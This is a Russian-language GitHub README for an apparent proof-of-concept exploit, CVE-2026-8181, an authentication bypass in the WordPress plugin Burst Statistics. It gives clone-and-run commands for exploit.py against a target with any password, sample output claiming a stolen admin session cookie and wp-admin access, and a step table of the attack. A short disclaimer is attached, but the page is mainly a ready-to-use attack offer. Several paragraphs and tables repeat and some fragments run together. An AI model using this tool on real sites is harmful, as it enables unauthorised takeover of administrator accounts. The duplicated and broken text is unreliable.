
Эксплойт PoC для WordPress Burst Statistics: обход аутентификации, позволяющий неавторизованно выдавать себя за администратора с помощью специально сформированного заголовка Authorization.
| **Требуется аутентификация
CVE-2026-8181 — это критическая уязвимость обхода аутентификации в WordPress-плагине Burst Statistics (версии 3.4.0 — 3.4.1.1). Эта ошибка позволяет неаутентифицированному злоумышленнику выдавать себя за любого администратора, используя некорректную обработку возвращаемого значения в функции is_mainwp_authenticated() при проверке паролей приложений из заголовка Authorization.
Уязвимость присутствует в функции is_mainwp_authenticated() плагина Burst Statistics. Ошибка срабатывает из-за:
CVE-2026-8181 — это критическая уязвимость обхода аутентификации в WordPress-плагине Burst Statistics (версии 3.4.0 — 3.4.1.1). Эта ошибка позволяет неаутентифицированному злоумышленнику выдавать себя за любого администратора, используя некорректную обработку возвращаемого значения в функции is_mainwp_authenticated() при проверке паролей приложений из заголовка Authorization.
Уязвимость присутствует в функции is_mainwp_authenticated() плагина Burst Statistics. Ошибка срабатывает из-за:
# Clone the repository
git clone https://github.com/0xTerror/CVE-2026-8181-Burst-Statistics-Auth-Bypass.git
cd CVE-2026-8181-Burst-Statistics-Auth-Bypass
# Install dependencies
pip install -r requirements.txt
python exploit.py -t http://target.com --username admin --password anypassword
python exploit.py -t http://example.com -u admin -p whatever123 --proxy http://127.0.0.1:8080
$ python exploit.py -t http://example.com -u admin -p whatever123
[+] Target: http://example.com
[+] Username: admin
[+] Password: whatever123
[+] Sending crafted request...
[+] Success! Authentication bypassed.
[+] Admin session cookie obtained: abc123xyz456
[+] Gained admin access to: http://example.com/wp-admin/
3.4.2 или более поздней.Authorization.3.4.2 (или более позднюю).Этот инструмент предоставляется только в образовательных целях и для авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Вы несёте ответственность за получение явного разрешения на тестирование любой системы, в отношении которой вы его применяете. Несанкционированный доступ к компьютерным системам противозаконен и наказывается по закону.
Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.
Если вы считаете этот проект полезным, пожалуйста, поставьте ему ⭐ на GitHub!
| Факт | Детали |
|---|
| CVE ID | CVE-2026-8181 |
| Оценка CVSS | 9.8 (Критическая) |
| Вектор | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Плагин | Burst Statistics (альтернатива Google Analytics) |
| Затронутые версии | 3.4.0 – 3.4.1.1 |
| Исправленная версия | 3.4.2 |
| Тип атаки | Обход аутентификации / повышение привилегий |
| Требуется аутентификация | ❌ Нет |
| Взаимодействие с пользователем | ❌ Нет |
| Факт | Детали |
|---|
| CVE ID | CVE-2026-8181 |
| Оценка CVSS | 9.8 (Критическая) |
| Вектор | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Плагин | Burst Statistics (альтернатива Google Analytics) |
| Затронутые версии | 3.4.0 – 3.4.1.1 |
| Исправленная версия | 3.4.2 |
| Тип атаки | Обход аутентификации / повышение привилегий |
| Требуется аутентификация | ❌ Нет |
| Взаимодействие с пользователем | ❌ Нет |
| Шаг | Участник | Действие | Результат |
|---|
| ① | Злоумышленник | Отправляет HTTP-запрос с Authorization: Basic admin:anypassword | Запрос отправлен цели |
| ② | Плагин Burst | Вызывает функцию is_mainwp_authenticated() | Проверяет заголовок Authorization |
| ③ | Логическая ошибка | Плагин возвращает TRUE даже с неверным паролем | Аутентификация обойдена |
| ④ | WordPress | Предоставляет привилегии администратора | Предоставлен полный доступ администратора |
| ⑤ | Злоумышленник | Получает полный контроль над WordPress | Сайт скомпрометирован |
| Аргумент | Короткий | Описание |
|---|
-t, --target | -t | Целевой URL WordPress |
-u, --username | -u | Имя пользователя администратора |
-p, --password | -p | Пароль (подойдёт любое значение) |
--proxy | HTTP-прокси для отладки |